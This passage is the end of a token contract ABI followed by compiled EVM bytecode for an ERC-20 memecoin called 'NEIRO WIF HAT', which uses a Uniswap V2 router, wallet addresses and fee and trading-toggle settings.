teMutability":"nonpayable","type":"function"},{"inputs":[],"name":"developmentWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromEnobleTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"liquidityWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a06040523480156200001157600080fd5b506040518060400160405280600d81526020017f4e4549524f2057494620484154000000000000000000000000000000000000008152506040518060400160405280600881526020017f4e4549524f57494600000000000000000000000000000000000000000000000081525081600490816200008f919062000bb4565b508060059081620000a1919062000bb4565b505050620000c4620000b8620004fa60201b60201c565b6200050260201b60201c565b60006c01431e0fae6d7217caa00000009050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff168152505062000153306080517fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff620005c860201b60201c565b6000600d819055506000600e819055506000600f81905550600f54600e54600d5462000180919062000cca565b6200018c919062000cca565b600c81905550600060118190555060006012819055506000601381905550601354601254601154620001bf919062000cca565b620001cb919062000cca565b601081905550601054601781905550600160186000620001f06200079960201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601860003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060016018600061dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060805173ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000341573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000367919062000d6f565b73ffffffffffffffffffffffffffffffffffffffff1663c9c653963060805173ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620003d1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003f7919062000d6f565b6040518363ffffffff1660e01b81526004016200041692919062000db2565b6020604051808303816000875af115801562000436573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200045c919062000d6f565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620004bd620004b06200079960201b60201c565b82620007c360201b60201c565b6001600a60146101000a81548160ff0219169083151502179055506001600a60156101000a81548160ff0219169083151502179055505062000fc0565b600033905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036200063a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620006319062000e66565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620006ac576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620006a39062000efe565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516200078c919062000f31565b60405180910390a3505050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000835576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200082c9062000f9e565b60405180910390fd5b62000849600083836200093060201b60201c565b80600260008282546200085d919062000cca565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000910919062000f31565b60405180910390a36200092c600083836200093560201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620009bc57607f821691505b602082108103620009d257620009d162000974565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830262000a3c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620009fd565b62000a488683620009fd565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000a9562000a8f62000a898462000a60565b62000a6a565b62000a60565b9050919050565b6000819050919050565b62000ab18362000a74565b62000ac962000ac08262000a9c565b84845462000a0a565b825550505050565b600090565b62000ae062000ad1565b62000aed81848462000aa6565b505050565b5b8181101562000b155762000b0960008262000ad6565b60018101905062000af3565b5050565b601f82111562000b645762000b2e81620009d8565b62000b3984620009ed565b8101602085101562000b49578190505b62000b6162000b5885620009ed565b83018262000af2565b50505b505050565b600082821c905092915050565b600062000b896000198460080262000b69565b1980831691505092915050565b600062000ba4838362000b76565b9150826002028217905092915050565b62000bbf826200093a565b67ffffffffffffffff81111562000bdb5762000bda62000945565b5b62000be78254620009a3565b62000bf482828562000b19565b600060209050601f83116001811462000c2c576000841562000c17578287015190505b62000c23858262000b96565b86555062000c93565b601f19841662000c3c86620009d8565b60005b8281101562000c665784890151825560018201915060208501945060208101905062000c3f565b8683101562000c86578489015162000c82601f89168262000b76565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000cd78262000a60565b915062000ce48362000a60565b925082820190508082111562000cff5762000cfe62000c9b565b5b92915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000d378262000d0a565b9050919050565b62000d498162000d2a565b811462000d5557600080fd5b50565b60008151905062000d698162000d3e565b92915050565b60006020828403121562000d885762000d8762000d05565b5b600062000d988482850162000d58565b91505092915050565b62000dac8162000d2a565b82525050565b600060408201905062000dc9600083018562000da1565b62000dd8602083018462000da1565b9392505050565b600082825260208201905092915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600062000e4e60248362000ddf565b915062000e5b8262000df0565b604082019050919050565b6000602082019050818103600083015262000e818162000e3f565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600062000ee660228362000ddf565b915062000ef38262000e88565b604082019050919050565b6000602082019050818103600083015262000f198162000ed7565b9050919050565b62000f2b8162000a60565b82525050565b600060208201905062000f48600083018462000f20565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000f86601f8362000ddf565b915062000f938262000f4e565b602082019050919050565b6000602082019050818103600083015262000fb98162000f77565b9050919050565b6080516130f762000fff6000396000818161079601528181611e5501528181611f3601528181611f5d01528181611ff9015261202001526130f76000f3fe6080604052600436106101bb5760003560e01c8063715018a6116100ec578063c04a54141161008a578063d85ba06311610064578063d85ba06314610623578063dd62ed3e1461064e578063e2f456051461068b578063f2fde38b146106b6576101c2565b8063c04a5414146105a4578063d4698016146105cf578063d7f40c76146105fa576101c2565b806393ec52de116100c657806393ec52de146104d457806395d89b41146104ff578063a457c2d71461052a578063a9059cbb14610567576101c2565b8063715018a61461046757806375f0a8741461047e5780638da5cb5b146104a9576101c2565b8063313ce567116101595780634ada218b116101335780634ada218b146103a95780636a486a8e146103d45780636ddd1713146103ff57806370a082311461042a576101c2565b8063313ce56714610316578063395093511461034157806349bd5a5e1461037e576101c2565b806318160ddd1161019557806318160ddd1461025a578063182073a41461028557806323b872dd146102ae57806327c8f835146102eb576101c2565b806306fdde03146101c7578063095ea7b3146101f25780631694505e1461022f576101c2565b366101c257005b600080fd5b3480156101d357600080fd5b506101dc6106df565b6040516101e9919061217f565b60405180910390f35b3480156101fe57600080fd5b5061021960048036038101906102149190612249565b610771565b60405161022691906122a4565b60405180910390f35b34801561023b57600080fd5b50610244610794565b604051610251919061231e565b60405180910390f35b34801561026657600080fd5b5061026f6107b8565b60405161027c9190612348565b60405180910390f35b34801561029157600080fd5b506102ac60048036038101906102a7919061238f565b6107c2565b005b3480156102ba57600080fd5b506102d560048036038101906102d091906123cf565b610873565b6040516102e291906122a4565b60405180910390f35b3480156102f757600080fd5b506103006108a2565b60405161030d9190612431565b60405180910390f35b34801561032257600080fd5b5061032b6108a8565b6040516103389190612468565b60405180910390f35b34801561034d57600080fd5b5061036860048036038101906103639190612249565b6108b1565b60405161037591906122a4565b60405180910390f35b34801561038a57600080fd5b506103936108e8565b6040516103a09190612431565b60405180910390f35b3480156103b557600080fd5b506103be61090e565b6040516103cb91906122a4565b60405180910390f35b3480156103e057600080fd5b506103e9610921565b6040516103f69190612348565b60405180910390f35b34801561040b57600080fd5b50610414610927565b60405161042191906122a4565b60405180910390f35b34801561043657600080fd5b50610451600480360381019061044c9190612483565b61093a565b60405161045e9190612348565b60405180910390f35b34801561047357600080fd5b5061047c610982565b005b34801561048a57600080fd5b50610493610996565b6040516104a09190612431565b60405180910390f35b3480156104b557600080fd5b506104be6109bc565b6040516104cb9190612431565b60405180910390f35b3480156104e057600080fd5b506104e96109e6565b6040516104f69190612348565b60405180910390f35b34801561050b57600080fd5b506105146109ec565b604051610521919061217f565b60405180910390f35b34801561053657600080fd5b50610551600480360381019061054c9190612249565b610a7e565b60405161055e91906122a4565b60405180910390f35b34801561057357600080fd5b5061058e60048036038101906105899190612249565b610af5565b60405161059b91906122a4565b60405180910390f35b3480156105b057600080fd5b506105b9610b18565b6040516105c69190612431565b60405180910390f35b3480156105db57600080fd5b506105e4610b3e565b6040516105f19190612431565b60405180910390f35b34801561060657600080fd5b50610621600480360381019061061c91906125f8565b610b64565b005b34801561062f57600080fd5b50610638610c25565b6040516106459190612348565b60405180910390f35b34801561065a57600080fd5b5061067560048036038101906106709190612654565b610c2b565b6040516106829190612348565b60405180910390f35b34801561069757600080fd5b506106a0610cb2565b6040516106ad9190612348565b60405180910390f35b3480156106c257600080fd5b506106dd60048036038101906106d89190612483565b610cb8565b005b6060600480546106ee906126c3565b80601f016020809104026020016040519081016040528092919081815260200182805461071a906126c3565b80156107675780601f1061073c57610100808354040283529160200191610767565b820191906000526020600020905b81548152906001019060200180831161074a57829003601f168201915b5050505050905090565b60008061077c610d3b565b9050610789818585610d43565b600191505092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600254905090565b6107ca610f0c565b80601860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405161086791906122a4565b60405180910390a25050565b60008061087e610d3b565b905061088b858285610f8a565b610896858585611016565b60019150509392505050565b61dead81565b60006012905090565b6000806108bc610d3b565b90506108dd8185856108ce8589610c2b565b6108d89190612723565b610d43565b600191505092915050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600a60149054906101000a900460ff1681565b60105481565b600a60159054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61098a610f0c565b61099460006116eb565b565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60035481565b6060600580546109fb906126c3565b80601f0160208091040260200160405190810160405280929190818152602001828054610a27906126c3565b8015610a745780601f10610a4957610100808354040283529160200191610a74565b820191906000526020600020905b815481529060010190602001808311610a5757829003601f168201915b5050505050905090565b600080610a89610d3b565b90506000610a978286610c2b565b905083811015610adc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ad3906127c9565b60405180910390fd5b610ae98286868403610d43565b60019250505092915050565b600080610b00610d3b565b9050610b0d818585611016565b600191505092915050565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b610b6c610f0c565b60005b8251811015610c2057600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16838281518110610bc457610bc36127e9565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff160315610c0d57610c0c838281518110610bfe57610bfd6127e9565b5b6020026020010151836117b1565b5b8080610c1890612818565b915050610b6f565b505050565b600c5481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b610cc0610f0c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d2f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d26906128d2565b60405180910390fd5b610d38816116eb565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610db2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da990612964565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e21576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e18906129f6565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610eff9190612348565b60405180910390a3505050565b610f14610d3b565b73ffffffffffffffffffffffffffffffffffffffff16610f326109bc565b73ffffffffffffffffffffffffffffffffffffffff1614610f88576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f7f90612a62565b60405180910390fd5b565b6000610f968484610c2b565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110105781811015611002576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ff990612ace565b60405180910390fd5b61100f8484848403610d43565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611085576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161107c90612b60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110f4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110eb90612bf2565b60405180910390fd5b600a60149054906101000a900460ff16806111585750601860008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b806111ac5750601860008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b6111eb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111e290612c5e565b60405180910390fd5b60008103611204576111ff83836000611852565b6116e6565b600061120f3061093a565b90506000600b5482101590508080156112345750600a60159054906101000a900460ff165b801561124d5750600a60169054906101000a900460ff16155b80156112a25750601960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b80156112f85750601860008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561134e5750601860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611392576001600a60166101000a81548160ff021916908315150217905550611376611ac8565b6000600a60166101000a81548160ff0219169083151502179055505b6000600a60169054906101000a900460ff16159050601860008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806114485750601860008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561145257600090505b600081156116cd57601960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156114b557506000601054115b15611583576114e36127106114d560105488611d6a90919063ffffffff16565b611d8090919063ffffffff16565b9050601054601354826114f69190612c7e565b6115009190612cef565b601660008282546115119190612723565b92505081905550601054601154826115299190612c7e565b6115339190612cef565b601460008282546115449190612723565b925050819055506010546012548261155c9190612c7e565b6115669190612cef565b601560008282546115779190612723565b925050819055506116a9565b601960008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156115de57506000600c54115b156116a85761160c6127106115fe600c5488611d6a90919063ffffffff16565b611d8090919063ffffffff16565b9050600c54600f548261161f9190612c7e565b6116299190612cef565b6016600082825461163a9190612723565b92505081905550600c54600d54826116529190612c7e565b61165c9190612cef565b6014600082825461166d9190612723565b92505081905550600c54600e54826116859190612c7e565b61168f9190612cef565b601560008282546116a09190612723565b925050819055505b5b60008111156116be576116bd873083611852565b5b80856116ca9190612d20565b94505b6116d8878787611852565b601754601081905550505050505b505050565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b80601960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118c1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b890612b60565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611930576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161192790612bf2565b60405180910390fd5b61193b838383611d96565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156119c1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119b890612dc6565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611aaf9190612348565b60405180910390a3611ac2848484611d9b565b50505050565b6000611ad33061093a565b90506000601554601454601654611aea9190612723565b611af49190612723565b905060008060028360165486611b0a9190612c7e565b611b149190612cef565b611b1e9190612cef565b90506000611b358286611da090919063ffffffff16565b90506000479050611b4582611db6565b6000611b5a8247611da090919063ffffffff16565b90506000611b8587611b7760145485611d6a90919063ffffffff16565b611d8090919063ffffffff16565b90506000611bb088611ba260155486611d6a90919063ffffffff16565b611d8090919063ffffffff16565b90506000818385611bc19190612d20565b611bcb9190612d20565b9050600060168190555060006014819055506000601581905550600087118015611bf55750600081115b15611c4257611c048782611ff3565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5618682601654604051611c3993929190612de6565b60405180910390a15b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051611c8890612e4e565b60006040518083038185875af1925050503d8060008114611cc5576040519150601f19603f3d011682016040523d82523d6000602084013e611cca565b606091505b505080985050600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611d1690612e4e565b60006040518083038185875af1925050503d8060008114611d53576040519150601f19603f3d011682016040523d82523d6000602084013e611d58565b606091505b50508098505050505050505050505050565b60008183611d789190612c7e565b905092915050565b60008183611d8e9190612cef565b905092915050565b505050565b505050565b60008183611dae9190612d20565b905092915050565b6000600267ffffffffffffffff811115611dd357611dd26124b5565b5b604051908082528060200260200182016040528015611e015781602001602082028036833780820191505090505b5090503081600081518110611e1957611e186127e9565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611ebe573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611ee29190612e78565b81600181518110611ef657611ef56127e9565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611f5b307f000000000000000000000000000000000000000000000000000000000000000084610d43565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401611fbd959493929190612f9e565b600060405180830381600087803b158015611fd757600080fd5b505af1158015611feb573d6000803e3d6000fd5b505050505050565b61201e307f000000000000000000000000000000000000000000000000000000000000000084610d43565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518863ffffffff1660e01b81526004016120a596959493929190612ff8565b60606040518083038185885af11580156120c3573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906120e8919061306e565b5050505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561212957808201518184015260208101905061210e565b60008484015250505050565b6000601f19601f8301169050919050565b6000612151826120ef565b61215b81856120fa565b935061216b81856020860161210b565b61217481612135565b840191505092915050565b600060208201905081810360008301526121998184612146565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006121e0826121b5565b9050919050565b6121f0816121d5565b81146121fb57600080fd5b50565b60008135905061220d816121e7565b92915050565b6000819050919050565b61222681612213565b811461223157600080fd5b50565b6000813590506122438161221d565b92915050565b600080604083850312156122605761225f6121ab565b5b600061226e858286016121fe565b925050602061227f85828601612234565b9150509250929050565b60008115159050919050565b61229e81612289565b82525050565b60006020820190506122b96000830184612295565b92915050565b6000819050919050565b60006122e46122df6122da846121b5565b6122bf565b6121b5565b9050919050565b60006122f6826122c9565b9050919050565b6000612308826122eb565b9050919050565b612318816122fd565b82525050565b6000602082019050612333600083018461230f565b92915050565b61234281612213565b82525050565b600060208201905061235d6000830184612339565b92915050565b61236c81612289565b811461237757600080fd5b50565b60008135905061238981612363565b92915050565b600080604083850312156123a6576123a56121ab565b5b60006123b4858286016121fe565b92505060206123c58582860161237a565b9150509250929050565b6000806000606084860312156123e8576123e76121ab565b5b60006123f6868287016121fe565b9350506020612407868287016121fe565b925050604061241886828701612234565b9150509250925092565b61242b816121d5565b82525050565b60006020820190506124466000830184612422565b92915050565b600060ff82169050919050565b6124628161244c565b82525050565b600060208201905061247d6000830184612459565b92915050565b600060208284031215612499576124986121ab565b5b60006124a7848285016121fe565b91505092915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6124ed82612135565b810181811067ffffffffffffffff8211171561250c5761250b6124b5565b5b80604052505050565b600061251f6121a1565b905061252b82826124e4565b919050565b600067ffffffffffffffff82111561254b5761254a6124b5565b5b602082029050602081019050919050565b600080fd5b600061257461256f84612530565b612515565b905080838252602082019050602084028301858111156125975761259661255c565b5b835b818110156125c057806125ac88826121fe565b845260208401935050602081019050612599565b5050509392505050565b600082601f8301126125df576125de6124b0565b5b81356125ef848260208601612561565b91505092915050565b6000806040838503121561260f5761260e6121ab565b5b600083013567ffffffffffffffff81111561262d5761262c6121b0565b5b612639858286016125ca565b925050602061264a8582860161237a565b9150509250929050565b6000806040838503121561266b5761266a6121ab565b5b6000612679858286016121fe565b925050602061268a858286016121fe565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806126db57607f821691505b6020821081036126ee576126ed612694565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061272e82612213565b915061273983612213565b9250828201905080821115612751576127506126f4565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006127b36025836120fa565b91506127be82612757565b604082019050919050565b600060208201905081810360008301526127e2816127a6565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600061282382612213565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203612855576128546126f4565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f205860008201527f5452554d50206164647265737300000000000000000000000000000000000000602082015250565b60006128bc602d836120fa565b91506128c782612860565b604082019050919050565b600060208201905081810360008301526128eb816128af565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061294e6024836120fa565b9150612959826128f2565b604082019050919050565b6000602082019050818103600083015261297d81612941565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006129e06022836120fa565b91506129eb82612984565b604082019050919050565b60006020820190508181036000830152612a0f816129d3565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612a4c6020836120fa565b9150612a5782612a16565b602082019050919050565b60006020820190508181036000830152612a7b81612a3f565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000612ab8601d836120fa565b9150612ac382612a82565b602082019050919050565b60006020820190508181036000830152612ae781612aab565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612b4a6025836120fa565b9150612b5582612aee565b604082019050919050565b60006020820190508181036000830